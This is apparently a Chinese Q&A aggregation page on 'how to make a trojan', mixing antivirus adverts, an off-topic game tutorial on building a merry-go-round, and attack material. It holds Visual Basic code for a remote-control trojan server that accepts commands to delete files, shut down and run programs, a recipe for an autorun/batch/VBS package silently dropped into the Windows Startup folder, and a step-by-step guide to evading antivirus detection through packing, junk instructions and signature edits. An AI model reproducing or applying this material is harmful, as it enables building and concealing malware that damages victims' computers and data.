如何做出木马？

愿我的答案 能够解决您的烦忧

最近总是看到有人要木马病毒，我想说如果是小病毒，那么 *** 出来会立刻被杀毒软件杀掉，如果是厉害的病毒，那么这病毒会优先整治你自己

1，所以说，如果自己不太懂病毒，就别乱玩，只能伤到自己。

2，下载腾讯电脑管家“8.4”最新版，对电脑首先进行一个体检，打开所有防火墙避免系统其余文件被感染。

3，打开杀毒页面开始查杀，切记要打开小红伞引擎。

4，如果普通查杀不能解决问题，您可以打开腾讯电脑管家---工具箱---顽固木马专杀- 进行深度

扫描。

5，查杀处理完所有病毒后，立刻重启电脑，再进行一次安全体检，清除多余系统缓存文件，避免二次感染。

如果您对我的答案不满意，可以继续追问或者提出宝贵意见，谢谢

木马怎么做 （举例）

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。

怎么 *** 木马？

建议楼主不要这么做,害人害己啊,建议试试腾讯电脑管家吧.杀毒与防护2合1.

腾讯电脑管家是腾讯公司出品的一款专业的安全软件，它采用4+1引擎，腾讯金山双云端，查杀能力已经达到世界一流水平，而且具有电脑管理功能，可以优化系统，修复漏洞，清理垃圾等等，是一款非常优秀的软件，建议您试用一下采用4+1引擎，拥有16层防护，杀毒+管理二合一的全新安软诚邀您的体验.

希望能够帮到你.

怎么样做木马

楼主想要 *** 木马的目的是什么？是为了盗取某个人的资料？如果是那我劝楼主放弃此想法。

如果是想提高计算机水平，那么：

*** 木马首先要学习编程语言.但是我可以说, *** 木马需要非常高的编程水平和电脑知识的熟悉度,也需要一定的智商和观察力.

这不是一件简单的事,需要达到计算机程序员那样的水准,楼主应该不是干这个的,要不然不会问这种问题.那就需要从底层做起,一步一步地,就像学一门外语一样, *** ?或者西班牙?从菜鸟学到高手,那你就会 *** 木马了.

但是需要楼主注意的一点，我国法律已经修改了,传播、制造计算机病毒等危害计算机、 *** 安全的，是会触及刑法的。

如果楼主哪一天达到了能 *** 木马的高度，何尝不去研究安全软件呢？

旋转木马怎么做?

首先，进入我们的材料准备：淡蓝硬砂块、转轴方块、蓝色电能线、开关、白杨木围栏、果木沙发、黑龙雕像、美味蛋糕、黄色玻璃灯、土块

之一步：用淡蓝硬砂块做一根柱子，高7格，这个作为旋转木马的主要基柱，小伙伴可以选择别的颜色

第二步：在基柱的最顶端砂块四周各横向延伸6格，这样，旋转木马的基本轮廓已经做成了，同样，如果不喜欢这个颜色，可以换一种砂块

第三步：接下来就是装饰一下我们的旋转木马，可以在四周上方的柱子上各放一个黑龙雕像，这样可以显得比较威严，然后在柱子的左侧各方一个黄色玻璃灯，这样黑夜我们也可以游玩的

第四步：在基柱的正上方放一个美味蛋糕，这也是修饰的作用，如果不喜欢可以换别的东西

第五步：接下来就开始放置我们的木马了，首先，在四周横向柱子上放置白杨木围栏，一根柱子可以放两条，在黄色玻璃灯左侧纵向放一条，在柱子的右侧第3格再放一条

第六步：在白杨木围栏的末端放置沙发，因为迷你世界里目前还没有更新木马，所以这里我们用沙发来代替，这样，旋转木马基本就已经做成了

第七步：就是给我们的旋转木马通电，放置开关，就能正常运行了，这里还是要用到我们之前学到的电路教程，在我们的基柱下方挖两格深，在基柱下方放置一个转轴方块

第八步：用电能线把转轴方块和开关连接起来，注意：这里尽量深一点，可以把蓝色电能线埋在地面下方，找到你想要的开关位置，直接把开关放在上面

第九步：找一个合适的位置放置开关

第十步：放好开关之后，打开开关，旋转木马就已经开始运行了

木马设计怎么做

*** 恶意软件：（最后把文件全部隐藏，然后再压缩）

1.新建文本，输入

[AutoRun]

open=shell.dat

重命名为inf的格式，文件名自定吧！

2.继续新建一个文本：输入：

@echo off

xxx.vbe

c:\windows\explorer c:\

del autorun.inf

del rad.exe

del shell.bat

然后转化为bat格式，文件名字命名为：shell.bat（xxx.vbe中的xxx是你做（任意一个）的文件名，这里你写上去是需要更改一下！）

3.继续新建文本，输入：

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -r -t 0 -c ""....（请保留好计算机正在处理的数据"" ",0 ,true

dim a

do while(a "1000")

a = inputbox ("开始运行： .exe ""请等待....","处理程序","...处理中，请稍候...",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"结束运行 .exe，正在准备重启计算机"

loop

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "cmd.exe /c shutdown -a",0 ,true

msgbox chr(13)+chr(13)+chr(13)+"完毕

(全部输入，请勿修改，修改会导致不成功的可能！）

然后转换为vbe格式。

文件 *** 完毕！

全选择文件，压缩，弹出对话栏，压缩选项选择创建自解压式文件，然后点击高级，在点击自解压选项，解压路径填：C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 然后填上解压后运行：shell.bat，然后点击模式，在安静模式里选择全部隐藏，ok，开始压缩！

这样，一个恶意软件就生成了~

怎么 *** 木马

*** 木马有很多中的、首先是编程的一些软件、这个是你自己选的、自己想学哪种编程就去学哪种编程、反正都能写木马的、编程的软件有VC、VB、C++/C、易语言、delph、JAVA等等、都有很多的、C、VB、JAVA都是一些高级语言的、你要写木马必须要学这些的、最简单的是易语言了、但是也是很差的、但可以写很多东西的、只要你会写就行了、会了想写什么就写什么、木马这个很简单的、会的人基本都能写、

如何做木马免杀

木马免杀浓缩精华版教程

之一部分：对国内外杀毒软件分析

在讲定位内存特征码前，先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现，内存查杀，一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴，金山，等等它们的内存查杀意义不大,会 *** 免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有内存查杀功能,但内存查杀功能比较弱.只针对影响力非常大的病毒程序.一般的黑客软件都没有提取内存特征码.

第二部分：木马免杀的对策

一. 要使一个木马免杀，首先要准备一个不加壳的木马，这点非常重要，否则下面的免杀操作就不能进行下去。

二.然后我们要木马的内存免杀，从上面分析可以看出，目前的内存查杀，只有瑞星最强，其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀，要进行内存特征码的定位和修改，才能内存免杀。

三.对符其它的杀毒软件，比如江民，金山，诺顿,卡巴.我们可以采用下面的 *** ,或这些方面的组合使用.

1.入口点加1免杀法.

2.变化入口地址免杀法

3.加花指令法免杀法

4.加壳或加伪装壳免杀法.

5.打乱壳的头文件免杀法.

6.修改文件特征码免杀法.

第三部分:免杀技术实例演示部分

一.入口点加1免杀法:

1.用到工具:PEditor

2.特点:非常简单实用,但有时还会被卡巴查杀.

3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可.

二.变化入口地址免杀法:

1.用到工具:OllyDbg,PEditor

2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.

3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.

三.加花指令法免杀法:

1.用到工具:OllyDbg,PEditor

2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.

3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.

四.加壳或加伪装壳免杀法:

1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.

2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀.

3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳.

五.打乱壳的头文件或壳中加花免杀法:

1.用到工具:秘密行动 ,UPX加壳工具.

2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好.

3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.

六.修改文件特征码免杀法:

1.用到工具:特征码定位器,OllyDbg

2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好.

3.操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程.

第四部分:快速定位与修改瑞星内存特征码

一.瑞星内存特征码特点:由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便.

二.定位与修改要点:

1.首先用特征码定位器大致定位出瑞星内存特征码位置

2.然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.

第五部分:免杀方案实例演示部分

1.完全免杀方案一:

内存特征码修改 + 加UPX壳 + 秘密行动工具打乱UPX壳的头文件.

2.完全免杀方案二:

内存特征码修改 + 加压缩壳 + 加壳的伪装

3.完全免杀方案三:

内存特征码修改 + 修改各种杀毒软件的文件特征码 + 加压缩壳

4.完全免杀方案四:

内存特征码修改 + 加花指令 + 加压壳

5.完全变态免杀方案五:

内存特征码修改 + 加花指令 + 入口点加1 + 加压缩壳UPX + 打乱壳的头文件

还有其它免杀方案可任意组合.达到更好的免杀效果.